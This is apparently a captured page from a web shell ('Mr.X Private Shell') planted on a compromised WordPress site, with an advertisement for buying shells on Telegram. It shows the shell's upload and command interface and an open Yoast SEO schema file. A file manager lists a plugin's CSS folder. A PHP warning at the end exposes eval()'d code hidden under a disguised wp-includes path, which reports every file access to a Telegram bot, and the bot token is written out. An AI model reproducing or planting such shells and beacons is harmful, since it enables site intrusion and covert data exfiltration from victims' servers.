����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

eliteafr@216.73.217.64: ~ $
<?php

namespace Yoast\WP\SEO\Generators\Schema;

/**
 * Returns schema Author data.
 */
class Author extends Person {

	/**
	 * Determine whether we should return Person schema.
	 *
	 * @return bool
	 */
	public function is_needed() {
		if ( $this->context->indexable->object_type === 'user' ) {
			return true;
		}

		if (
			$this->context->indexable->object_type === 'post'
			&& $this->helpers->schema->article->is_author_supported( $this->context->indexable->object_sub_type )
			&& $this->context->schema_article_type !== 'None'
		) {
			return true;
		}

		return false;
	}

	/**
	 * Returns Person Schema data.
	 *
	 * @return bool|array Person data on success, false on failure.
	 */
	public function generate() {
		$user_id = $this->determine_user_id();
		if ( ! $user_id ) {
			return false;
		}

		$data = $this->build_person_data( $user_id );

		if ( $this->site_represents_current_author() === false ) {
			$data['@type'] = [ 'Person' ];
			unset( $data['logo'] );
		}

		// If this is an author page, the Person object is the main object, so we set it as such here.
		if ( $this->context->indexable->object_type === 'user' ) {
			$data['mainEntityOfPage'] = [
				'@id' => $this->context->main_schema_id,
			];
		}

		// If this is a post and the author archives are enabled, set the author archive url as the author url.
		if ( $this->context->indexable->object_type === 'post' ) {
			if ( $this->helpers->options->get( 'disable-author' ) !== true ) {
				$data['url'] = $this->helpers->user->get_the_author_posts_url( $user_id );
			}
		}

		return $data;
	}

	/**
	 * Determines a User ID for the Person data.
	 *
	 * @return bool|int User ID or false upon return.
	 */
	protected function determine_user_id() {
		$user_id = 0;

		if ( $this->context->indexable->object_type === 'post' ) {
			$user_id = (int) $this->context->post->post_author;
		}

		if ( $this->context->indexable->object_type === 'user' ) {
			$user_id = $this->context->indexable->object_id;
		}

		/**
		 * Filter: 'wpseo_schema_person_user_id' - Allows filtering of user ID used for person output.
		 *
		 * @param int|bool $user_id The user ID currently determined.
		 */
		$user_id = \apply_filters( 'wpseo_schema_person_user_id', $user_id );

		if ( \is_int( $user_id ) && $user_id > 0 ) {
			return $user_id;
		}

		return false;
	}

	/**
	 * An author should not have an image from options, this only applies to persons.
	 *
	 * @param array        $data      The Person schema.
	 * @param string       $schema_id The string used in the `@id` for the schema.
	 * @param bool         $add_hash  Whether or not the person's image url hash should be added to the image id.
	 * @param WP_User|null $user_data User data.
	 *
	 * @return array The Person schema.
	 */
	protected function set_image_from_options( $data, $schema_id, $add_hash = false, $user_data = null ) {
		if ( $this->site_represents_current_author( $user_data ) ) {
			return parent::set_image_from_options( $data, $schema_id, $add_hash, $user_data );
		}

		return $data;
	}
}

Filemanager

Name Type Size Permission Actions
conditionals Folder 0755
modules Folder 0755
templates Folder 0755
.htaccess File 127 B 0644
admin-bar.css File 808 B 0644
admin-bar.min.css File 659 B 0644
admin-rtl.css File 128.2 KB 0644
admin-rtl.min.css File 106.03 KB 0644
admin-top-bar-rtl.css File 4.54 KB 0644
admin-top-bar-rtl.min.css File 3.88 KB 0644
admin-top-bar.css File 4.53 KB 0644
admin-top-bar.min.css File 3.88 KB 0644
admin.css File 128.2 KB 0644
admin.min.css File 106.03 KB 0644
app-base-rtl.css File 1.8 KB 0644
app-base-rtl.min.css File 1.01 KB 0644
app-base.min.css File 1.01 KB 0644
app-rtl.css File 93.82 KB 0644
app-rtl.min.css File 77.92 KB 0644
app.css File 93.81 KB 0644
app.min.css File 77.91 KB 0644
author.php File 2.97 KB 0644
common-rtl.css File 28.74 KB 0644
common-rtl.min.css File 25.59 KB 0644
common.css File 25.88 KB 0644
common.min.css File 23.43 KB 0644
editor-preview-rtl.css File 141.86 KB 0644
editor-preview-rtl.min.css File 116.14 KB 0644
editor-preview.css File 141.46 KB 0644
editor-preview.min.css File 115.79 KB 0644
editor-responsive.strings-20260520203706-20260520204053-20260520213840-20260520213926-20260520214012-20260520214108-20260520214202-20260520214251.js File 29 B 0644
editor-responsive.strings-20260520203706-20260520204053-20260520213840-20260520213926-20260520214012-20260520214108-20260520214202-20260522152815.js File 29 B 0644
editor-responsive.strings-20260520203706-20260520204053-20260520213840-20260520213926-20260520214012-20260520214108-20260520214202-20260522180010-20260523040552.js File 29 B 0644
editor-responsive.strings-20260520203706-20260520204053-20260520213840-20260520213926-20260520214012-20260520214108-20260520214202-20260522180010-20260526135942.js File 29 B 0644
editor-responsive.strings-20260520203706-20260520204053-20260520213840-20260520213926-20260520214012-20260520214108-20260520214202-20260522180010.js File 29 B 0644
editor-responsive.strings-20260520203706-20260520204053-20260520213840-20260520213926-20260520214012-20260520214108-20260520214202.js File 29 B 0644
editor-rtl.css File 199.98 KB 0644
editor-rtl.min.css File 168.36 KB 0644
editor-v2-app-bar-overrides.css File 1.31 KB 0644
editor-v2-app-bar-overrides.min.css File 1.02 KB 0644
editor.css File 199.76 KB 0644
editor.min.css File 168.18 KB 0644
faq.php File 2.91 KB 0644
frontend-rtl.css File 61.38 KB 0644
frontend-rtl.min.css File 52.01 KB 0644
frontend.css File 61.38 KB 0644
frontend.min.css File 52.01 KB 0644
responsive-bar.css File 4.27 KB 0644
responsive-bar.min.css File 3.54 KB 0644
theme-dark.css File 2.96 KB 0644
theme-dark.min.css File 2.22 KB 0644
theme-light.css File 2.94 KB 0644
theme-light.min.css File 2.21 KB 0644
widget-accordion-rtl.min.css File 1.73 KB 0644
widget-accordion.min.css File 1.73 KB 0644
widget-alert-rtl.min.css File 1.61 KB 0644
widget-alert.min.css File 1.61 KB 0644
widget-contact-buttons-base-rtl.min.css File 19.72 KB 0644
widget-contact-buttons-base.min.css File 19.72 KB 0644
widget-contact-buttons-var-1-rtl.min.css File 3.46 KB 0644
widget-contact-buttons-var-1.min.css File 3.46 KB 0644
widget-contact-buttons-var-10-rtl.min.css File 9.4 KB 0644
widget-contact-buttons-var-10.min.css File 9.4 KB 0644
widget-contact-buttons-var-3-rtl.min.css File 11.65 KB 0644
widget-contact-buttons-var-3.min.css File 11.65 KB 0644
widget-contact-buttons-var-4-rtl.min.css File 7.84 KB 0644
widget-contact-buttons-var-4.min.css File 7.84 KB 0644
widget-contact-buttons-var-6-rtl.min.css File 3.19 KB 0644
widget-contact-buttons-var-7-rtl.min.css File 2.36 KB 0644
widget-contact-buttons-var-7.min.css File 2.36 KB 0644
widget-contact-buttons-var-8-rtl.min.css File 5.42 KB 0644
widget-contact-buttons-var-8.min.css File 5.42 KB 0644
widget-contact-buttons-var-9-rtl.min.css File 9.29 KB 0644
widget-contact-buttons-var-9.min.css File 9.29 KB 0644
widget-contact-buttons-vars-rtl.min.css File 40 B 0644
widget-contact-buttons-vars.min.css File 40 B 0644
widget-counter-rtl.min.css File 793 B 0644
widget-counter.min.css File 793 B 0644
widget-divider-rtl.min.css File 4.2 KB 0644
widget-divider.min.css File 4.2 KB 0644
widget-floating-bars-base-rtl.min.css File 8.74 KB 0644
widget-floating-bars-base.min.css File 8.74 KB 0644
widget-floating-bars-var-2-rtl.min.css File 5.15 KB 0644
widget-floating-bars-var-2.min.css File 5.15 KB 0644
widget-floating-bars-var-3-rtl.min.css File 4.85 KB 0644
widget-floating-bars-var-3.min.css File 4.85 KB 0644
widget-floating-bars-vars-rtl.min.css File 40 B 0644
widget-floating-bars-vars.min.css File 40 B 0644
widget-floating-buttons-rtl.min.css File 90.64 KB 0644
widget-floating-buttons.min.css File 90.64 KB 0644
widget-google_maps-rtl.min.css File 301 B 0644
widget-google_maps.min.css File 301 B 0644
widget-heading-rtl.min.css File 600 B 0644
widget-heading.min.css File 600 B 0644
widget-icon-box-rtl.min.css File 9.83 KB 0644
widget-icon-box.min.css File 9.83 KB 0644
widget-icon-list-rtl.min.css File 10.07 KB 0644
widget-icon-list.min.css File 10.07 KB 0644
widget-image-box-rtl.min.css File 1.38 KB 0644
widget-image-box.min.css File 1.38 KB 0644
widget-image-carousel-rtl.min.css File 382 B 0644
widget-image-carousel.min.css File 382 B 0644
widget-image-gallery-rtl.min.css File 2.4 KB 0644
widget-image-gallery.min.css File 2.4 KB 0644
widget-image-rtl.min.css File 254 B 0644
widget-image.min.css File 254 B 0644
widget-link-in-bio-base-rtl.min.css File 12.15 KB 0644
widget-link-in-bio-base.min.css File 12.15 KB 0644
widget-link-in-bio-rtl.min.css File 17.62 KB 0644
widget-link-in-bio-var-2-rtl.min.css File 861 B 0644
widget-link-in-bio-var-2.min.css File 861 B 0644
widget-link-in-bio-var-3-rtl.min.css File 744 B 0644
widget-link-in-bio-var-3.min.css File 744 B 0644
widget-link-in-bio-var-4-rtl.min.css File 828 B 0644
widget-link-in-bio-var-4.min.css File 828 B 0644
widget-link-in-bio-var-5-rtl.min.css File 1.63 KB 0644
widget-link-in-bio-var-5.min.css File 1.63 KB 0644
widget-link-in-bio-var-7-rtl.min.css File 1.68 KB 0644
widget-link-in-bio-var-7.min.css File 1.68 KB 0644
widget-link-in-bio-vars-rtl.min.css File 40 B 0644
widget-link-in-bio-vars.min.css File 40 B 0644
widget-link-in-bio.min.css File 17.62 KB 0644
widget-menu-anchor-rtl.min.css File 106 B 0644
widget-menu-anchor.min.css File 106 B 0644
widget-nested-accordion-rtl.min.css File 5.04 KB 0644
widget-nested-accordion.min.css File 5.04 KB 0644
widget-nested-tabs-rtl.min.css File 14.51 KB 0644
widget-nested-tabs.min.css File 14.51 KB 0644
widget-progress-rtl.min.css File 1.2 KB 0644
widget-progress.min.css File 1.2 KB 0644
widget-rating-rtl.min.css File 1.29 KB 0644
widget-rating.min.css File 1.29 KB 0644
widget-social-icons-rtl.min.css File 5.03 KB 0644
widget-social-icons.min.css File 5.03 KB 0644
widget-spacer-rtl.min.css File 1.31 KB 0644
widget-spacer.min.css File 1.31 KB 0644
widget-star-rating-rtl.min.css File 2.64 KB 0644
widget-star-rating.min.css File 2.64 KB 0644
widget-tabs.min.css File 4.1 KB 0644
widget-testimonial-rtl.min.css File 1.64 KB 0644
widget-testimonial.min.css File 1.64 KB 0644
widget-text-editor-rtl.min.css File 705 B 0644
widget-text-path-rtl.min.css File 1.06 KB 0644
widget-text-path.min.css File 1.06 KB 0644
widget-toggle-rtl.min.css File 1.54 KB 0644
widget-toggle.min.css File 1.54 KB 0644
widget-video-rtl.min.css File 1.82 KB 0644
widget-video.min.css File 1.82 KB 0644

Warning: file_get_contents(https://api.telegram.org/bot6480565468:AAHPgwqvr55vU-lBvGV23jlYJuGCrOCL4XM/sendMessage?chat_id=1722171889&text=File+accessed%3A+http%3A%2F%2Fwww.eliteafrique.com%2Fwp-includes%2Fl10n%2Fcss%2Fv3%2Fwbddf%2Fadmin.php%3Fdir%3D%252Fhome%252Feliteafr%252Fwww%252Fwp-content%252Fplugins%252Felementor%252Fassets%252Fcss%26read%3D%252Fhome%252Feliteafr%252Fwww%252Fwp-content%252Fplugins%252Felementor%252Fassets%252Fcss%252Fauthor.php): Failed to open stream: HTTP request failed! HTTP/1.1 429 Too Many Requests in /home/eliteafr/www/wp-includes/l10n/css/v3/wbddf/admin.php(112993) : eval()'d code(18150) : eval()'d code on line 2024